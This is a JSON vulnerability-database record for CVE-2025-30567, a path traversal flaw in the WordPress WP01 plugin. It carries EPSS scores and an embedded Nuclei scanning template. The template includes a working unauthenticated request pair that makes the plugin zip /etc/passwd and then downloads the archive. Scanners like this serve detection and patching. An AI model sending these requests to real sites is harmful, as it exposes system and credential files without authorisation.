{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2025-30567/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2025-30567/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2025-30567/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2025-30567/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2025-30567/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2025-30567"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2025-30567"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": false
    },
    "epss": {
      "epss": 0.02786,
      "kev": false,
      "percentile": 0.85803
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2025/CVE-2025-30567.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2025-30567\n\ninfo:\n  name: WordPress WP01 - Path Traversal\n  author: s4e-io\n  severity: high\n  description: |\n    Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in wp01ru WP01 allows Path Traversal. This issue affects WP01: from n/a through 2.6.2.\n  impact: |\n    Unauthenticated attackers can exploit path traversal to download arbitrary files from the server as ZIP archives, potentially exposing sensitive configuration files and credentials.\n  remediation: |\n    Upgrade to WP01 version 2.6.3 or later that properly validates file paths in the generate ZIP archive functionality.\n  reference:\n    - https://github.com/Oyst3r1ng/CVE-2025-30567\n    - https://patchstack.com/database/wordpress/plugin/wp01/vulnerability/wordpress-wp01-2-6-2-arbitrary-file-download-vulnerability?_s_id=cve\n    - https://nvd.nist.gov/vuln/detail/CVE-2025-30567\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2025-30567\n    cwe-id: CWE-22\n    epss-score: 0.02786\n    epss-percentile: 0.85803\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: wp01ru\n    product: wp01\n    framework: wordpress\n  tags: cve,cve2025,lfi,wp-plugin,wordpress,wp01,wp,vkev,vuln\n\nflow: http(1) && http(2)\n\nhttp:\n  - raw:\n      - |\n        POST /wp-admin/admin-ajax.php?action=wp01_generate_zip_archive HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/x-www-form-urlencoded\n\n        target=passwd&path=/etc/\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(body, \"wp-01-passwd.zip\")'\n          - 'contains(content_type, \"application/json\")'\n          - 'status_code == 200'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /wp-content/wp01-backup/wp-01-passwd.zip HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'contains(content_type, \"application/zip\")'\n          - 'status_code == 200'\n        condition: and\n# digest: 490a0046304402200418a28e864ee9d35ef0ed6ea7b12e12c3496f4fd486b6d96e1aebec61348b0e022053793a9e0495bd6d6f8c9e7647c0ee3a2df22f3b94443252cb91fac1b49a3774:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2025-30567"
}